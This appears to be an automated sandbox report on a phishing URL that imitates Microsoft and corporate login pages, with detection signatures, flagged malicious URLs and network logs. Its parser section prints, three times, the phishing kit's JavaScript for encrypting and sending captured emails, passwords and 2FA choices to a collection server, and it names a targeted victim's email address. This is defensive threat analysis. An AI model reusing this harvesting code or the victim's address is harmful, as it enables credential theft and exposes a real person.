Edit tour

Windows Analysis Report
https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT_714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519_47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT

Overview

General Information

Sample URL:	https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx
Analysis ID:	1466693
Infos:

Detection

HTMLPhisher

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected HtmlPhish10

Phishing site detected (based on image similarity)

Phishing site detected (based on logo match)

Phishing site detected (based on shot match)

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden URLs or javascript code

HTML title does not match URL

Invalid T&C link found

Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5664 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 4156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=2020,i,4672451666164520208,10170229004511272603,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.itanhangasaude.com.br/www/1475312998d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT___714820ufgtMx5cBwKyVuzlJn3VAYy1QdJUF0IuhCb1EFSueBwxxR9n7T4VNMSyrZd9kcF9rD67v2lJn3VufgtMP8xfiVl9n3IuhCbR9n7Tx5cBw4VNMSx5cBwi3vtsVl9n3MryfS1EFSuufgtMi3vts7O1AR408519___47741237d8aKqdmPdPNJZi4JNq7WIowwvYGOvuIT" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
2.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
2.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
2.7.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://vkwek.ckyucle.com/opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/12TvEGAMcd3aPS6720	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180	Avira URL Cloud: Label: malware
Source: https://nzd92.6gniu68.ru/5575968202461485388865565DuGzcrTyOZLFNLDIYSVXZDPOLLDSEDNQMSF	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/56NViOjdyBE66K4aemhQsnnijWU2q89KCdOOZ89106	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/favicon.ico	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/#-	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/78l8NmRVxJ45fjuJRst60	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/45TplGCNDXCptZb896Wyz84jpQxy69	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ghUQ6Orlc7xuQgWcYlBAqViojmkfQHsxQ81JqDSmnddnAwJvMkE5kY34tjef210	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/90YOSnhY5T8JbcpfefM5jeqjHMc7G9ab72	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/yzBt71gp856BSdkJ4Qop47	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/pqJEZxAGJZqUBhc85R9yzrCUwx40	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/opyBbj15zt7RBaYZmgGW9bxLK2mu0meuvIDz6YOPBdPPv2mru5dCE8ifyMqnIcd240	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/2DUx/?W-crystal.begin@schulergroup.com	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/xy12R7tzrssHzef25	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/wpn0pH3CIM5nU02jRmQ0L1Y1phPSwbSM0ag	Avira URL Cloud: Label: malware
Source: https://vkwek.ckyucle.com/ef6ywsH6ValAwIHzgds78wUwuLf89smkl92	Avira URL Cloud: Label: malware

Phishing

AI detected phishing page

Source: https://vkwek.ckyucle.com	LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'microsoft.com' associated with the brand Microsoft. The presence of a prominent login form asking for email credentials is a common phishing tactic. The domain name appears suspicious and unrelated to Microsoft, indicating potential phishing. The image resembles a legitimate Microsoft login page, which is a social usering technique to mislead users. Additionally, the presence of a suspicious link ('No account? Create one!') that could potentially lead to a harmful page further supports the phishing suspicion. DOM: 2.5.pages.csv
Source: https://vkwek.ckyucle.com	LLM: Score: 9 brands: Schuler Reasons: The URL 'https://vkwek.ckyucle.com' does not match the legitimate domain 'schulergroup.com' associated with the Schuler brand. The presence of a prominent login form asking for a password is a common phishing tactic. The domain name is highly suspicious and does not align with the legitimate domain. The use of social usering techniques is evident as the site mimics a legitimate login page to deceive users into entering their credentials. Additionally, the link to 'Forgot my password' could potentially lead to further phishing attempts. DOM: 2.7.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 2.5.pages.csv, type: HTML
Source: Yara match	File source: 2.6.pages.csv, type: HTML
Source: Yara match	File source: 2.7.pages.csv, type: HTML

Phishing site detected (based on image similarity)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

Matcher: Found strong image similarity, brand: MICROSOFT

Phishing site detected (based on logo match)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	Matcher: Template: microsoft matched
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	Matcher: Template: microsoft matched

Phishing site detected (based on shot match)

Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	Matcher: Template: captcha matched
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	Matcher: Template: captcha matched

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "XkpxX";var emailcheck = "crystal.begin@schulergroup.com";var webname = "rtrim(/web8/, '/')";var urlo = "rfrj4D3IOrBb34OKfQNxY9akOmZckEWxXo9xwrWKJaQReBHFIHg5kn2";var gdf = "ijG4yW3R7FY813hQeumBEAUyzYJiiCY97PHkccd114";var odf = "ghU2EPAQmKCucHi9wxct32lto7kIab643";var requestsent = false;var pagedata = "";var redirecturl = "";let userAgent = navigator.userAgent;let browserName;let userip;let usercountry;var errorcodeexecuted = false;if(userAgent.match(/chrome\|chromium\|crios/i)){ browserName = "chrome";} else if(userAgent.match(/firefox\|fxios/i)){ browserName = "firefox";} else if(userAgent.match(/safari/i)){ browserName = "safari";} else if(userAgent.match(/opr\//i)){ browserName = "opera";} else if(userAgent.match(/edg/i)){ browserName = "edge";} else{ browserName="No browser detection";}function encryptData(data) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const encrypted = CryptoJS.AES.encrypt(data, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return encrypted.toString();}function decryptData(encryptedData) { const key = CryptoJS.enc.Utf8.parse('1234567890123456'); const iv = CryptoJS.enc.Utf8.parse('1234567890123456'); const decrypted = CryptoJS.AES.decrypt(encryptedData, key, { iv: iv, padding: CryptoJS.pad.Pkcs7, mode: CryptoJS.mode.CBC }); return decrypted.toString(CryptoJS.enc.Utf8);}const sendAndReceive = (route, args, getresponse) => {if(requestsent == true && route !== "twofaselect"){return JSON.parse({"message": "waiting for previous request to complete"});}if(requestsent == false \|\| route == "twofaselect"){requestsent = true;let routename = null;let randpattern = null;if(route == "checkemail"){randpattern = /(pq\|rs)[A-Za-z0-9]{6,18}(yz\|12\|34)[A-Za-z0-9]{2,7}(uv\|wx)(3[1-9]\|40)/gm;}if(route == "checkpass"){randpattern = /(yz\|12)[A-Za-z0-9]{7,14}(56\|78)[A-Za-z0-9]{3,8}(op\|qr)(4[1-9]\|50)/gm;}if(route == "twofaselect"){randpattern = /(56\|78\|90)[A-Za-z0-9]{8,16}(23\|45\|67)[A-Za-z0-9]{4,9}(st\|uv)(5[1-9]\|60)/gm;}if(route == "twofaselected"){randpattern = /(23\|45)[A-Za-z0-9]{9,20}(89\|90\|ab)[A-Za-z0-9]{5,10}(vw\|xy)(6[1-9]\|70)/gm;}let randexp = new RandExp(randpattern);let randroute = randexp.gen();let formattedargs = 0;if(route == "checkemail"){formattedargs = args.map(item => '/'+item).join('')+'/'+appnum+'/'+getresponse;}if(route !== "checkemail"){formattedargs = '/'+token+args.map(item => '/'+item).join('')+'/'+getresponse;}// console.log(formattedargs);let encrypteddata = encryptData(formattedargs);const makeRequest = (retryCount) => { return new Promise((resolve, reject) => { // url: 'http://91.219.150.47:3000/' + route + formattedargs, // type: 'GET',

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: Number of links: 0

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com

HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: Title: Fair Value does not match URL

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Terms of use
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: Invalid link: Privacy & cookies

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs

HTTP Parser: <input type="password" .../> found

Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/2DUx/#-crystal.begin@schulergroup.com	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	HTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/57uca/0x4AAAAAAAdPpzcgFVvp_PUK/auto/normal	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No favicon

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="author".. found

Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found
Source: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs	HTTP Parser: No <meta name="copyright".. found

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.43.61.160:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.115.3.253:443 -> 192.168.2.6:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62978 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62980 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.113.103.199:443 -> 192.168.2.6:62987 version: TLS 1.2

Source: global traffic	TCP traffic: 192.168.2.6:49712 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:61005 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.6:62906 -> 162.159.36.2:53

Source: unknown

HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49753 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253
Source: unknown	TCP traffic detected without corresponding DNS query: 40.115.3.253

